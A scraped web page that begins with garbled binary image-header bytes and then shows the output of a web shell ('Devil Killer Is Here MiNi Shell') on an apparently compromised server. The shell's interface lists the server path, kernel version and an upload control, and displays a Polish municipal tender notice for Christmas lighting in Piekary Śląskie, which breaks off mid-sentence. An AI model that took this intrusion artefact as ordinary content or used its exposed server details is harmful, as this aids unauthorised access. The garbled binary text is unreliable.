JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20211019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20211019/0023720401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Montaż z przyłączeniem do sieci elektrycznej, utrzymanie, demontaż oraz wynajem elementów oświetlenia świątecznego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Piekary Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255418</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bytomska 84</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piekary Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-940</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">323939379</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@piekary.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://piekary.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Montaż z przyłączeniem do sieci elektrycznej, utrzymanie, demontaż oraz wynajem elementów oświetlenia świątecznego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-42cbffca-3013-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00237204</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001004/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.14 Montaż z przyłączeniem do sieci elektrycznej, utrzymanie, demontaż oraz wynajem elementów oświetlenia świątecznego.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) poprzez Platformę przetargową<br/>pod adresem:<br/>https://josephine.proebiz.com/pl/ (zwanej dalej zamiennie Platformą przetargową), w wierszu<br/>oznaczonym tytułem oraz znakiem niniejszego postępowania<br/>lub<br/>2) pocztą elektroniczną na adres e-mail Zamawiającego: bzp@piekary.pl oraz adresy e mail<br/>Wykonawców podane w formularzach ofertowych. Po otwarciu ofert kontakt przez adres e-mail będzie<br/>możliwy tylko poprzez adres(adresy) wskazany w formularzu ofertowym.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej:<br/>Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany jest<br/>zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://josephine.proebiz.com/pl/ oraz zaakceptować regulamin korzystania z Platformy przetargowej.<br/>2. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w<br/>ust. 1 niniejszego rozdziału SWZ.<br/>3. Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie<br/>internetowej Platformy przetargowej - pod adresem:<br/>https://josephine.proebiz.com/pl/<br/>4. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca,<br/><br/><br/>tj.PROEBIZ s.r.o., Masarykovo náměstí 52/33, CZ - 702 00 Ostrava - Moravská Ostrava, C.9176, nr tel.<br/>+48 222 139 900, e-mail: houston@proebiz.com od poniedziałku do piątku (dni robocze) w godz. 8.00 –<br/>16.00.<br/>5. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia<br/>Ogłoszenie nr 2021/BZP 00176498/01 z dnia 2021-09-10<br/>2021-09-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>oferty, zostały opisane w Instrukcjach użytkowników Platformy przetargowej.<br/>6. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym<br/>oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego<br/>zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane dalej „zobowiązaniem podmiotu<br/>udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z<br/>dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U.<br/>z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1<br/>ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>7. Zamawiający informuje, iż w przypadku przesyłania przez Wykonawcę dokumentów elektronicznych<br/>skompresowanych (w tym oferty przetargowej) dopuszczone są wyłącznie formaty danych wskazane w<br/>Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. (t.j. Dz. U. z 2017 r., poz. 2247) w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>Powyższe oznacza, iż Zamawiający nie dopuszcza przysyłania dokumentów elektronicznych (w tym<br/>oferty) skompresowanych formatem .rar<br/>8. Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 6 niniejszego rozdziału SWZ,<br/>przekazywane w postępowaniu o udzielenie zamówienia, sporządza się w postaci elektronicznej, w<br/>formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany<br/>bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej,<br/>wskazanych przez Zamawiającego w niniejszej SWZ.<br/>9. W przypadku, gdy dokumenty elektroniczne w postępowaniu o udzielenie zamówienia,<br/>przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w poufności tych<br/>informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.<br/>10. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub<br/>oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informujemy, że zgodnie z art. 13 ust. 1 i ust. 2 ogólnego<br/>rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (dalej RODO):<br/>1. Administratorem Pani/Pana danych jest Prezydent Miasta w Piekarach Śląskich z siedzibą przy ul.<br/>Bytomskiej 84, 41-940 Piekary Śląskie, tel.32/3939411 (centrala), bip.piekary.pl , adres e-mail:<br/>um@piekary.pl.<br/>2. Wyznaczony został Inspektor ochrony danych, z którym można się skontaktować w sprawie ochrony<br/>swoich danych pod adresem – e-mail: dane.osobowe@piekary.pl. lub pisemnie na adres siedziby<br/>Administratora wskazany powyżej. Jakakolwiek zmiana osoby wyznaczonej na Inspektora ochrony<br/>danych nie będzie wpływała na wskazane sposoby kontaktu.<br/>3. Pani/Pana dane będą przetwarzane w celu prowadzenia procedury przetargowej, w wyniku której<br/>zostanie wybrany wykonawca, z którym zostanie zawarta umowa w sprawie zamówienia publicznego,zgodnie z art. 6 ust. 1 lit. c RODO, w związku z postanowieniami ustawy PZP z dnia 29<br/>stycznia 2004.<br/>Ogłoszenie nr 2021/BZP 00176498/01 z dnia 2021-09-10<br/>2021-09-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>4. Z poszanowaniem poufnego charakteru Pani/Pana danych, w tym stosując mechanizmy<br/>minimalizujące liczbę przekazywanych danych oraz ograniczając możliwość przekazywania danych o<br/>charakterze wrażliwym Pani/Pana dane osobowe będą ujawniane podmiotom i osobom upoważnionym<br/>na podstawie przepisów prawa:<br/>- LTC spółka z o.o. z siedzibą przy ul. Pabianickiej 159/161, 93-490 Łódź, której powierzono dane w<br/>związku z asystą techniczną elektronicznego systemu obiegu dokumentów w Urzędzie Miasta Piekary<br/>Śląskie.<br/>- uczestnikom i wszystkim zainteresowanym prowadzonymi postępowaniami przetargowymi,<br/>- operatorowi pocztowemu lub kurierowi (w przypadku korespondencji papierowej)<br/>- ponadto w zakresie stanowiącym informację publiczną dane będą ujawniane każdemu<br/>zainteresowanemu taką informacją.<br/>5. Pani/Pana dane osobowe będą przechowywane jedynie w okresie niezbędnym do realizacji celu o<br/>którym mowa w ust. 3. Po zrealizowaniu tego celu dane osobowe będą przechowywane w celach<br/>archiwalnych przez okres 5 lat- dokumentacja zamówień publicznych, 10 lat – umowy w sprawie<br/>zamówienia publicznego, zgodnie z postanowieniami Rozporządzenia Prezesa Rady Ministrów z dnia<br/>18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz<br/>instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych. Okres przetwarzania może<br/>ulec zmianie ze względu na inne przepisy prawa.<br/>6. Przysługuje Pani/Panu prawo dostępu do treści swoich danych oraz prawo do żądania ich<br/>sprostowania w takim zakresie, w jakim wskazane dane są niezgodne ze stanem faktycznym,<br/>usunięcia, jeżeli dane nie są niezbędne do wywiązania się z obowiązku wynikającego z przepisu prawa<br/>lub w ramach sprawowania władzy publicznej oraz do ograniczenia przetwarzania. Ponadto ma<br/>Pani/Pan prawo wniesienia sprzeciwu wobec przetwarzania. W celu skorzystania z ww. należy<br/>skontaktować się z administratorem lub Inspektorem Ochrony Danych.<br/>7. Podanie danych jest wymogiem ustawowym. Niepodanie uniemożliwia wzięcie udziału w procedurze<br/>wyboru wykonawcy.<br/>8. Administrator danych osobowych, na mocy art.17 ust. 3 lit. b RODO, ma prawo odmówić usunięcia<br/>Pani/Pana danych osobowych.<br/>9. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego ds. ochrony<br/>danych osobowych – Prezesa Urzędu Ochrony Danych Osobowych, jeśli uzna Pani/Pan, iż przepisy<br/>RODO zostały naruszone;<br/>10. Pani/Pana dane osobowe nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji<br/>ani profilowania, o którym mowa w art. 22.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271-43/IG/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I – Elementy duże<br/><br/>1) ul. Bytomska <br/> - dekoracja świetlna w kształcie choinki,- 1 szt.<br/><br/>2) ul. Bytomska – przed Urzędem Miasta<br/> - element przestrzenny w formie zaprzęgu z saniami- 1 szt.<br/><br/>3) ul. Bytomska - miejsce wskazane przez zamawiającego <br/> - element przestrzenny w formie otwartej kartki świątecznej- 1 szt.<br/><br/>4) ul. Wyszyńskiego „Rondo Kopalni Andaluzja”<br/>- element przestrzenny 3D – 3 szt.<br/><br/>5) ul. Oświęcimska miejsce wskazane przez zamawiającego <br/> - element przestrzenny 3D w kształcie bombki z kokardą- 1 szt.<br/><br/>6) Rondo „Kopalni Julian” <br/> - element przestrzenny 3D w kształcie bombki z kokardą- 3 szt<br/><br/>7) miejsce wskazane przez zamawiającego <br/> - element przestrzenny 3D -2 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98390000-3 - Inne usługi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-01-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">według przyjętych kryteriów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas usunięcia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – Elementy średnie i małe<br/><br/>1) ul. Przyjaźni<br/>- dekoracja świetlna element płaski 2D, montowana na latarni - ilość: 3 szt.<br/><br/>2) ul. Oświęcimska przed Ośrodkiem Kultury Andaluzja<br/>- dekoracja świetlna element płaski 2D – 13 szt., na schodach- 2 szt.<br/><br/>– 3) ul. Przyjaźni - przystanek<br/>- dekoracja świetlna element płaski 2D, montowany na słupach - ilość: 3 szt.<br/><br/>4) ul. Główna – 3 słupy po 1 elemencie na słup<br/>- dekoracja świetlna element płaski 2D montowany na słupach – ilość: 3 szt.<br/><br/>5) skrzyżowanie ul. Roździeńskiego z ul. Bednorza <br/>	- dekoracja świetlna element przestrzenny – ilość: 2 szt.<br/><br/>6) ul. Oświęcimska – Park Trzech Bohaterów<br/>	- dekoracja świetlna element płaski 2D -wilość: 5 szt.,<br/><br/>7) ul. Wyszyńskiego „Rondo Kopalni Andaluzja”<br/> - dekoracja świetlna element płaski 2D montowany na słupach (2 na jednym słupie – 1 kpl.) <br/> - ilość: 6 kpl.<br/><br/>8) ul. Bytomska<br/>- dekoracja świetlna element płaski 2D, montowany na latarniach - ilość: 36 szt.,<br/><br/>9) ul. Wyszyńskiego<br/>- dekoracja świetlna element płaski 2D, montowany na latarniach - ilość: 16 szt.,<br/><br/>10) miejsce wskazane przez Zamawiającego<br/>- dekoracja świetlna element płaski 2D - ilość: 10 szt.,<br/><br/>11) ul. Bytomska „Rondo Kopalni Julian”<br/>- dekoracja świetlna element płaski 2D montowany na słupach - ilość: 6 szt.,<br/><br/>12) element dekoracyjny w kształcie bramy powitalnej montowany nad jezdnią - ilość: 7 szt., w miejscach wskazanych przez Zamawiającego,<br/><br/>13) ul. Bytomska – przy budynku Urzędu Miasta<br/>- dekoracja drzewa wysokiego min. 20 m, <br/><br/>14) ul. Bytomska<br/>- dekoracja drzewa małego przy budynku MDK<br/><br/>15) ul. Roździeńskiego <br/>- dekoracja drzewa – ilość: 1 kpl.<br/><br/>16) ul. Oświęcimska – „pasaż”<br/>- sople świetlne, ilość 500 m<br/><br/>17) ul. Papieża Jana Pawła II <br/>- dekoracja świetlna element płaski 2D, montowany na słupach, ilość: 14 szt.<br/><br/>18) ul. Papieża Jana Pawła II <br/>- dekoracja świetlna element przestrzenny 3D ilość: 2 szt.<br/><br/>19) ul. Bytomska Plac Maryjny<br/>- dekoracja choinki żywej,<br/><br/>20) ul. Maczka<br/>- dekoracja świetlna element płaski 2D, montowany na latarni - ilość: 13 szt.,<br/><br/>21) ul. Olimpijska <br/>- dekoracja świetlna element płaski 2D, montowany na latarni - ilość: 6 szt.,<br/><br/>22) ul. Powstańców Śląskich <br/>- dekoracja świetlna element płaski 2D, montowany na latarni - ilość: 5 szt.<br/><br/>23) ul. Konstytucji 3-go Maja <br/>- dekoracja świetlna element płaski 2D, montowany na latarni - ilość: 5 szt.<br/><br/>24) ul. Nankera<br/>- dekoracja świetlna element płaski 2D, montowany na latarni – ilość 8 szt. <br/><br/>25) ul. Papieża Jana Pawła II<br/>- dekoracja świetlna element płaski 2D, montowany na latarni – ilość 6 szt.<br/><br/>26) miejsce wskazane przez Zamawiającego<br/>- dekoracja świetlna element przestrzenny 3D – ilość 1 szt.<br/><br/>27) ul. Zawiszy Czarnego<br/>- dekoracja świetlna element płaski 2D - ilość 5 szt.<br/><br/>28) ul. Żwirki<br/>- dekoracja świetlna element płaski 2D – ilość 2 szt.<br/><br/>29) ul. Bednorza<br/>- dekoracja świetlna element płaski 2D- ilość 7 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98390000-3 - Inne usługi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-01-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">według przyjętych kryteriów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas usunięcia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.4. Zdolność techniczna lub zawodowa:<br/><br/>3.4.1.Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że: <br/><br/>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w 